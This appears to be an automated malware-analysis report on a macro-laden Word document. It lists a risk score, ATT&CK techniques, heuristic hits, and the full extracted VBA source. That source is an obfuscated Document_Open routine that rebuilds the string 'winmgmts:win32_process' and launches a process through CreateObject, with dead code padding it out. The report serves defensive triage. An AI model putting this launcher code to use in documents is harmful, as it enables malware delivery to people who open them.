MALICIOUS
112
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample contains VBA macros, specifically a Document_Open macro that uses CreateObject, indicating malicious intent. The script attempts to read from various file paths, suggesting it may be trying to locate or prepare for a second-stage payload. The obfuscated nature of the script and the multiple file paths accessed point towards a downloader or dropper functionality.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Txqfipc8707 = CreateObject(I_578_ki05d2e3f96d) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8251 bytes |
SHA-256: 2ed55976d9425aa6a002473bb1c71eee8e80dcaff763b47a487ebd8b695e1425 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
121 of 199 identifiers look randomly generated (e.g. 'Nx30bnb806i2wqjysh') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Hip47dt3gxa" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Iwvbojo43fjdofbng End Sub Attribute VB_Name = "Y7gwqi1ive42" Attribute VB_Name = "Jvyc596mf28sbcz" Function Iwvbojo43fjdofbng() On Error Resume Next mKbjhqs = Hip47dt3gxa.StoryRanges.Item(244 / 244) GoTo WWiLBINGI Dim BgHReIFHE() As Byte Dim TkMYHIWIo As Integer TkMYHIWIo = FreeFile Open "F:\PQopA\vyPhIFLA\jQdqcDI.yfzCJR" For Binary Access Read As #TkMYHIWIo Open "O:\CLiLqZ\aNBcfJE\PuhnB.MPpLCeE" For Binary Access Read As #TkMYHIWIo ReDim BgHReIFHE(1 To LOF(intGend) - 5) Get #TkMYHIWIo, , BgHReIFHE Get #TkMYHIWIo, , BgHReIFHE Get #TkMYHIWIo, , BgHReIFHE Close #TkMYHIWIo WWiLBINGI: snahbsd = "]b2[sp]b2[s" Vdrq3bj0ngj = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s" GoTo LxtEdi Dim zxRaGGeIJ() As Byte Dim bgJaCWcA As Integer bgJaCWcA = FreeFile Open "F:\MxhyduCFg\LkAJHiFgy\UiRfC.PsWrEFRDE" For Binary Access Read As #bgJaCWcA Open "O:\MIKTtF\CJTXFAB\MMKRj.mmHqH" For Binary Access Read As #bgJaCWcA ReDim zxRaGGeIJ(1 To LOF(intGend) - 5) Get #bgJaCWcA, , zxRaGGeIJ Get #bgJaCWcA, , zxRaGGeIJ Get #bgJaCWcA, , zxRaGGeIJ Close #bgJaCWcA LxtEdi: Qhuu_lgubvl9cv_ = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s" GoTo XmbbBEHV Dim hzBtJ() As Byte Dim FOQjEJa As Integer FOQjEJa = FreeFile Open "F:\iuZAaFJH\PoFzEVDk\oSyCT.RpJkBBCIh" For Binary Access Read As #FOQjEJa Open "O:\qfSRYA\wDKjFJ\qjZes.BCQmse" For Binary Access Read As #FOQjEJa ReDim hzBtJ(1 To LOF(intGend) - 5) Get #FOQjEJa, , hzBtJ Get #FOQjEJa, , hzBtJ Get #FOQjEJa, , hzBtJ Close #FOQjEJa XmbbBEHV: D4o34irfndkjlgj5g = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s" GoTo ACFwrGBJG Dim nSovkijEy() As Byte Dim VMdvQT As Integer VMdvQT = FreeFile Open "F:\imwbE\aiRUDGE\BZNXMHFJ.kgudJWk" For Binary Access Read As #VMdvQT Open "O:\rDByLK\zyAEB\DnzbEI.PxLCucEz" For Binary Access Read As #VMdvQT ReDim nSovkijEy(1 To LOF(intGend) - 5) Get #VMdvQT, , nSovkijEy Get #VMdvQT, , nSovkijEy Get #VMdvQT, , nSovkijEy Close #VMdvQT ACFwrGBJG: Deyom47coza = "]b2[ss]b2[s" GoTo ouaADA Dim UCPDF() As Byte Dim BZWmAO As Integer BZWmAO = FreeFile Open "F:\gkKqIFBOi\GyNYEG\RyvQIA.zEMDEDH" For Binary Access Read As #BZWmAO Open "O:\EomQIDCW\LVNyf\EjlRvHEs.qNDKf" For Binary Access Read As #BZWmAO ReDim UCPDF(1 To LOF(intGend) - 5) Get #BZWmAO, , UCPDF Get #BZWmAO, , UCPDF Get #BZWmAO, , UCPDF Close #BZWmAO ouaADA: Fl4xbbija5u2 = D4o34irfndkjlgj5g + Deyom47coza + Qhuu_lgubvl9cv_ + snahbsd + Vdrq3bj0ngj GoTo xAdza Dim ndWQBD() As Byte Dim hJgZLCI As Integer hJgZLCI = FreeFile Open "F:\iUSjtD\HSzSqJGC\NoWlTmFB.iMMoBJ" For Binary Access Read As #hJgZLCI Open "O:\qoezR\GjzkD\txoSFK.iUjII" For Binary Access Read As #hJgZLCI ReDim ndWQBD(1 To LOF(intGend) - 5) Get #hJgZLCI, , ndWQBD Get #hJgZLCI, , ndWQBD Get #hJgZLCI, , ndWQBD Close #hJgZLCI xAdza: I_578_ki05d2e3f96d = Dhbu3zc6xkne5(Fl4xbbija5u2) GoTo QZTNh Dim lKBZBBG() As Byte Dim FjllU As Integer FjllU = FreeFile Open "F:\gjZtkB\PFHNFRFB\XjTTIsg.JdTCqc" For Binary Access Read As #FjllU Open "O:\nbrwo\NVVHWbIi\jFvmc.NyyqEC" For Binary Access Read As #FjllU ReDim lKBZBBG(1 To LOF(intGend) - 5) Get #FjllU, , lKBZBBG Get #FjllU, , lKBZBBG Get #FjllU, , lKBZBBG Close #FjllU QZTNh: Set Txqfipc8707 = CreateObject(I_578_ki05d2e3f96d) GoTo IyiAG Dim AVtwwQCJ() As Byte Dim GCKRDI As Integer GCKRDI = FreeFile Open "F:\fQNFJR\pFqHAdq\DpgGJGZlB.txwNkfsJ" For Binary Access Read As #GCKRDI Open "O:\zHWdBB\fUyeO\LpSSAACdB.fARtKGIFy" For Binary Access Read As #GCKRDI ReDim AVtwwQCJ(1 To LOF(intGend) - 5) Get #GCKRDI, , AVtwwQCJ Get #GCKRDI, , AVtwwQCJ Get #GCKRDI, , AVtwwQCJ Close #GCKRDI IyiAG: Xpw_e561ju5cvjg8 = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs)) GoTo JjNsJH Dim RbJcE() As Byte Dim rMESxwQFT As Integer rMESxwQFT = FreeFile Open "F:\hnFAzJBK\zlXjFd\ovMWyI.DciiII" For Binary Access Read As #rMESxwQFT Open "O:\eKMoG\vEZZF\WQowEI.oDZwWIj" For Binary Access Read As #rMESxwQFT ReDim RbJcE(1 To LOF(intGend) - 5) Get #rMESxwQFT, , RbJcE Get #rMESxwQFT, , RbJcE Get #rMESxwQFT, , RbJcE Close #rMESxwQFT JjNsJH: GoTo ddXwC Dim EzFFeHoJf() As Byte Dim XbDswJGc As Integer XbDswJGc = FreeFile Open "F:\hfvIQG\MXYlH\mLKwc.PJaQwBLH" For Binary Access Read As #XbDswJGc Open "O:\RoyRgJhB\GBSIY\JnjkD.JVDSJIISA" For Binary Access Read As #XbDswJGc ReDim EzFFeHoJf(1 To LOF(intGend) - 5) Get #XbDswJGc, , EzFFeHoJf Get #XbDswJGc, , EzFFeHoJf Get #XbDswJGc, , EzFFeHoJf Close #XbDswJGc ddXwC: Txqfipc8707.Create Dhbu3zc6xkne5(Xpw_e561ju5cvjg8), Oibet7wg7wyp, Cjeynptdc002 GoTo eHcnH Dim saCVs() As Byte Dim FoSgAHxEI As Integer FoSgAHxEI = FreeFile Open "F:\iKCJD\sxqjGtGAA\RueypE.KSvTdBAP" For Binary Access Read As #FoSgAHxEI Open "O:\fUyDa\axbkGz\EqLKFI.QUNSQAfk" For Binary Access Read As #FoSgAHxEI ReDim saCVs(1 To LOF(intGend) - 5) Get #FoSgAHxEI, , saCVs Get #FoSgAHxEI, , saCVs Get #FoSgAHxEI, , saCVs Close #FoSgAHxEI eHcnH: GoTo MclYG Dim uJXDA() As Byte Dim RahfCYd As Integer RahfCYd = FreeFile Open "F:\HqnmFC\EEKWiK\TpdeIzb.TQxCDiChf" For Binary Access Read As #RahfCYd Open "O:\KoZkV\qXwNIWE\hErpgJqE.zMxYhGl" For Binary Access Read As #RahfCYd ReDim uJXDA(1 To LOF(intGend) - 5) Get #RahfCYd, , uJXDA Get #RahfCYd, , uJXDA Get #RahfCYd, , uJXDA Close #RahfCYd MclYG: End Function Function Dhbu3zc6xkne5(A5u9wep0d3qelxmu) On Error Resume Next GoTo MbfoL Dim zaULB() As Byte Dim nJnfi As Integer nJnfi = FreeFile Open "F:\swUecQL\psFGcr\QCbmfo.zBIdJFDJ" For Binary Access Read As #nJnfi Open "O:\EjsoDG\RztRJEH\jrRhABGA.nYTFGCH" For Binary Access Read As #nJnfi ReDim zaULB(1 To LOF(intGend) - 5) Get #nJnfi, , zaULB Get #nJnfi, , zaULB Get #nJnfi, , zaULB Close #nJnfi MbfoL: Vm1r_lzkqy40vls = (A5u9wep0d3qelxmu) GoTo dWuSsrA Dim pKRBJFGGG() As Byte Dim ZWojIFH As Integer ZWojIFH = FreeFile Open "F:\jYJmuPu\sBktDAn\QVaTDHGxG.ZEfGSDG" For Binary Access Read As #ZWojIFH Open "O:\ADBKPBuE\NMFmIGClH\feOQAuyI.rjrTJyHaY" For Binary Access Read As #ZWojIFH ReDim pKRBJFGGG(1 To LOF(intGend) - 5) Get #ZWojIFH, , pKRBJFGGG Get #ZWojIFH, , pKRBJFGGG Get #ZWojIFH, , pKRBJFGGG Close #ZWojIFH dWuSsrA: Obya1ffmrx97q3nn9c = Yl4i2j6kjo6t6mf(Vm1r_lzkqy40vls) GoTo EqwNuBT Dim cloXuAN() As Byte Dim YgXdF As Integer YgXdF = FreeFile Open "F:\LrUUEQpH\LlDELII\rwDmDFED.ScPUFGgRs" For Binary Access Read As #YgXdF Open "O:\Iwvue\YtorDjHGw\tsCevxcs.nJmucACdC" For Binary Access Read As #YgXdF ReDim cloXuAN(1 To LOF(intGend) - 5) Get #YgXdF, , cloXuAN Get #YgXdF, , cloXuAN Get #YgXdF, , cloXuAN Close #YgXdF EqwNuBT: Dhbu3zc6xkne5 = Obya1ffmrx97q3nn9c GoTo aeFdVDUC Dim PdDIAD() As Byte Dim MzgADhWH As Integer MzgADhWH = FreeFile Open "F:\nVXTjCCZH\GnXgG\OqNCAGH.gooJyCB" For Binary Access Read As #MzgADhWH Open "O:\rTYDHXA\GPZDnsA\cUGTmBB.ybsfCmF" For Binary Access Read As #MzgADhWH ReDim PdDIAD(1 To LOF(intGend) - 5) Get #MzgADhWH, , PdDIAD Get #MzgADhWH, , PdDIAD Get #MzgADhWH, , PdDIAD Close #MzgADhWH aeFdVDUC: End Function Function Yl4i2j6kjo6t6mf(Dvmzdqwpdj3yna_bwu) E9wioco0r714hpi7v = Rx2xqust6ey2 GoTo ynTwPIHK Dim iIbcDSBJ() As Byte Dim UGaOfE As Integer UGaOfE = FreeFile Open "F:\TbFWCHC\vGFac\seMiJIFE.GNOoBGaI" For Binary Access Read As #UGaOfE Open "O:\JaeDsgGQH\jsQshJ\GIgkBKXQI.NucQgT" For Binary Access Read As #UGaOfE ReDim iIbcDSBJ(1 To LOF(intGend) - 5) Get #UGaOfE, , iIbcDSBJ Get #UGaOfE, , iIbcDSBJ Get #UGaOfE, , iIbcDSBJ Close #UGaOfE ynTwPIHK: Yl4i2j6kjo6t6mf = Replace(Dvmzdqwpdj3yna_bwu, "]b2[s", Nx30bnb806i2wqjysh) GoTo zqMwFKFj Dim tBhtyAc() As Byte Dim tgEIDnGWC As Integer tgEIDnGWC = FreeFile Open "F:\TyJRSE\afIiUO\mTOSw.BzErvOX" For Binary Access Read As #tgEIDnGWC Open "O:\eUmFqDC\yUBjl\LXFEN.BkINEo" For Binary Access Read As #tgEIDnGWC ReDim tBhtyAc(1 To LOF(intGend) - 5) Get #tgEIDnGWC, , tBhtyAc Get #tgEIDnGWC, , tBhtyAc Get #tgEIDnGWC, , tBhtyAc Close #tgEIDnGWC zqMwFKFj: End Function |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.